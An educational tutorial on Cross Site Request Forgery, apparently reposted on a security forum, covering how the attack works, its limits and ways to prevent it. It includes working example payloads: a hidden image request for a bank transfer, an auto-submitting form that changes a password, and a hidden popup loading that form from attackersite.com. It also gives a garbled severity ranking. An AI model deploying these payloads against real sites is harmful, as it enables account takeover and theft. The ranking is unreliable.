Understanding Cross Site Request Forgery

[Nytro]

Title: Understanding Cross Site Request Forgery
Author: Simo Ben youssef
Contact: simo_at_morxploit_dot_com
Published: 30 January 2013
MorXploit Research
http://www.morxploit.com
Audience: IT security professionals / Web administrators / Regular web users


Introduction:

Cross Site Request Forgery also known as XSRF and abbreviated as CSRF is a type of 'one click' attack, where a malicious code is used to exploit a victim's on-line account by automatically sending unauthorized instructions through the victim's browser to a vulnerable website and make changes based on the attacker's aim and the impact of the vulnerability.


Examples:

The attack works by making a target user click on a link which points to the attacker's malicious code, the code then sends commands to the vulnerable website which thinks that the request was willingly sent by the authenticated victim and process the changes.
An example could be a request to change a password, a vulnerable website will not ask you to confirm the change by submitting your current password, or will not use some other form of verification such as token IDs, which will lead to your password being changed without your permission and therefore giving the attacker complete access to your account.

The process involves three steps:

1- The victim clicks on a malicious link.
2- The link automatically requests changes to be made within the vulnerable site as defined by the attacker.
3- The website processes the change because it relies solely on the user authentication cookie.


Limitations:

For the attack to succeed, assuming that the attacker have successfully coded the exploit, 3 requirements are needed:

1- The target website must be vulnerable to CSRF.
2- The victim must click on a link.
3- The victim must be authenticated.


Severity:

According to the United States Department Of Homeland Security, CSRF vulnerability ranks in at the 909th most dangerous software bug ever found, CSRF can be used to change a victim's password, post data on the victim's behalf or even execute code remotely resulting in data compromise.


Technical exploitation:

In order to exploit CSRF, the attacker must have access to the same private area that the victim uses, then analyze the vulnerable HTML code.
The attacker needs to determine the form input names in case the HTTP POST method is used or variable names when the HTTP GET is used instead which is very rare.
The GET request can be easily exploited by using the 'img' tag to perform the malicious request.
For example, the attacker can include the following hidden link on his target page:

<img src="http://vulnerablebank/quickpay?senderaccount=victim&receiveraccount=attacker&amount=1000">

Which will send the specified amount of money to the attacker account.

The POST request which is the most common form used is a little bit tricky and can be visually detected, the reason is that there is no way a form can be posted 'silently' using just HTML, the only way to do that is through AJAX but luckily due to AJAX security restrictions it will not be possible to exploit it because AJAX will not send your authentication cookie from a domain name other than the target domain name itself.
The only way left is using JavaScript, which can automatically submit a form using the onload attribute within the body tag.
An example of a form that automatically attempts to change a user's password could be:

<html>
<body onload="document.xploitform.submit(); ">
<form name="xploitform" method="post" action="http://www.somevulnerablesite/changepassword">
<input type="hidden" name="newpassword" value='hacked'>
<input type="hidden" name="confirmpassword" value='hacked'>
</form></body>
</html>

To make this more interesting the attacker can execute the form's link as a small window pop up through another page while displaying a picture or other content to grab the victim's attention, in this particular case the attack will be a combination of both; CSRF and Social Engineering.
The following code can be used to perform that:

<center><img src="http://www.morxploit.com/images/logo.png"></center>
<body onload="window.open('http://attackersite.com/linktothepreviousform.html','myWin','scrollbars=no,width=1,height=1,left=2000,top=2000');">

Which will display an image in the center of the page and pop up the form as a small window and place it in the corner of the page.


Prevention:

1- Website side:

* Requiring the use of the user's current password when requesting changes.
* Implementing the use of user's hidden token IDs.

2- User side

* Avoid opening external links using the same authenticated browser, use a different unauthenticated browser instead or if you are using Google Chrome, hit Shift + CTRL + N to go into incognito mode.
* Experienced users can use a monitoring data tool such as the FireFox plugin Data Tamper to verify any data sent by the browser.


Conclusion:

CSRF are dangerous attacks that can result in data compromise when successfully exploited, it's both the website and the user responsibility to prevent such attacks.
The Internet has enormous security resources, Web developers and Website Admins have no excuse to learn basic security in order to protect their customers, meanwhile users should use some common sense and stop blindly clicking on links.


Author disclaimer:

The information contained in this entire document are for educational and demonstration purposes only. Modification, use and publishing this information is entirely on your own risk, I cannot be held responsible for any malicious use.

Sursa: http://www.morxploit.com/csrf.txt